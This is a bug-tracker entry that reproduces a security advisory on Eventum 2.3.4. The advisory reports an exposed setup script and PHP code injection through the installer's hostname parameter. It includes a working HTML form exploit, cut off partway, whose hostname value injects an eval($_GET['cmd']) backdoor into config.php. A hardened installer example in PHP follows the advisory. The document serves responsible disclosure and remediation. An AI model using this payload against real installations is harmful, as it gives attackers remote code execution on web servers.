Eventum Security Vulnerabilities Notification
Bug #1271499 reported by htbridge
Affects | Status | Importance | Assigned to | Milestone
---|---|---|---|---
Eventum | Fix Released | High | Elan Ruusamäe |
Bug Description
Hello,
High-Tech Bridge Security Research Lab has discovered multiple security vulnerabilities in Eventum 2.3.4.
Preview available here: https:/
Developers can contact us by email advisory (at) htbridge.com for details.
For any questions related to this notification message - please visit our General Information & Disclosure Policy page: https:/
Best regards,
High-Tech Bridge Security Research Lab
information type: Private Security → Public Security
Hello,
High-Tech Bridge Security Research Lab has discovered multiple security vulnerabilities in your product - Eventum.
Detailed description and all available details of the vulnerabilities are provided below in the email.
Please notify us by replying to this email when you release a security update, and provide us if possible with the URL of the patch/solution so we can add this URL to the advisory.
If you need more time to fix the vulnerabilities - please specify desired Public Disclosure date by replying to this email.
For any questions related to this notification email - please visit our General Information & Disclosure Policy page: https://www.htbridge.com/advisory/disclosure_policy.html
If you don't find an answer to your question there - please feel free to contact us by email: <email address hidden>
===============================================================
Advisory ID: HTB23198
Reference: https://www.htbridge.com/advisory/HTB23198
Product: Eventum
Vendor: Eventum Development Team
Vulnerable Version(s): 2.3.4 and probably prior
Tested Version: 2.3.4
Public Disclosure: February 12, 2014
Vulnerability Type: Incorrect Default Permissions [CWE-276], Code Injection [CWE-94]
Risk Level: Critical
CVSSv2 Base Scores: 6.4 (AV:N/AC:L/Au:N/C:N/I:P/A:P), 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C)
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
Advisory Details:
High-Tech Bridge Security Research Lab discovered a vulnerability in Eventum, which can be exploited to reinstall and compromise the vulnerable application.
1) Incorrect Default Permissions in Eventum
The vulnerability exists due to incorrect default permissions set for installation scripts. Access to the installation script located at "/setup/index.php" is not restricted by default and the script is not deleted during the installation process. A remote attacker can access the script and reinstall the vulnerable application.
The installation script can be accessed by a remote unauthenticated user via the following URL:
http://[host]/setup/index.php
2) Code Injection in Eventum
The vulnerability exists due to insufficient sanitization of the HTTP POST parameter "hostname" in the "/config/config.php" script during the installation process. A remote attacker can inject and execute arbitrary PHP code on the target system with the privileges of the webserver. Successful exploitation requires access to the application’s database, which can be achieved by providing the address of an attacker-controlled MySQL server.
The following exploitation example injects a backdoor into the "/config/config.php" file:
<form action="http://[host]/setup/index.php" method="post" name="main">
<input type="hidden" name="cat" value="install">
<input type="hidden" name="hostname" value="'); eval($_GET['cmd']); $tmp=('">
<input type="hidden" name="relative" value="/">
<input type="hidden" name="db_hostname" value="db_hostname">
<input type="hidden" name="db_name" value="db_name">
<input type="hidden" name="db_table_prefix" value="db_table_prefix">
<input type="hidden" name="drop_tables" value="yes">
<input type="hidden" name="db_username" value="db_username">
<input type="hidden" name="se...
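As an added example (not Eventum's own code and not part of the advisory above), this is how a PHP installer can avoid both issues the advisory describes: it refuses to run again once a configuration file exists, and it writes the request-supplied hostname into config.php as an escaped PHP literal after strict validation instead of splicing it into source text. CONFIG_FILE, the function names and the `define()` template are assumptions for illustration.

```php
<?php
// Added example: hardened installer pattern for the two advisory findings.
// CONFIG_FILE, the function names and the define() template are assumptions,
// not Eventum's real setup code.

const CONFIG_FILE = __DIR__ . '/config/config.php'; // assumed location

// 1) Incorrect default permissions: once a configuration exists, the setup
//    script must not be usable to reinstall the application.
function refuseIfInstalled(string $configFile): void
{
    if (file_exists($configFile)) {
        http_response_code(403);
        exit('Installation already completed; setup is disabled.');
    }
}

// 2) Code injection: validate the shape of the value first. Quotes, parentheses
//    and semicolons (as in "'); eval(...); $tmp=('") are rejected outright.
function validateHostname(string $hostname): string
{
    // RFC 1123 host labels, optionally followed by a port; nothing else.
    $re = '/^(?=.{1,253}$)[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?'
        . '(\.[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?)*(:\d{1,5})?$/i';
    if (!preg_match($re, $hostname)) {
        throw new InvalidArgumentException('Invalid hostname');
    }
    return $hostname;
}

// Defence in depth: even if validation were loosened later, var_export()
// escapes quotes and backslashes, so injected text stays a string literal.
function renderConfig(array $values): string
{
    $lines = ['<?php'];
    foreach ($values as $name => $value) {
        $lines[] = sprintf('define(%s, %s);', var_export($name, true), var_export($value, true));
    }
    return implode("\n", $lines) . "\n";
}

// Vulnerable shape from the advisory, shown only for contrast (never do this):
// $src = "define('APP_HOSTNAME', '" . $_POST['hostname'] . "');";

refuseIfInstalled(CONFIG_FILE);
$hostname = validateHostname($_POST['hostname'] ?? '');
file_put_contents(CONFIG_FILE, renderConfig(['APP_HOSTNAME' => $hostname]), LOCK_EX);
```

Deleting or access-restricting the setup directory after installation remains the primary fix; the guard above only covers the case where that step was missed.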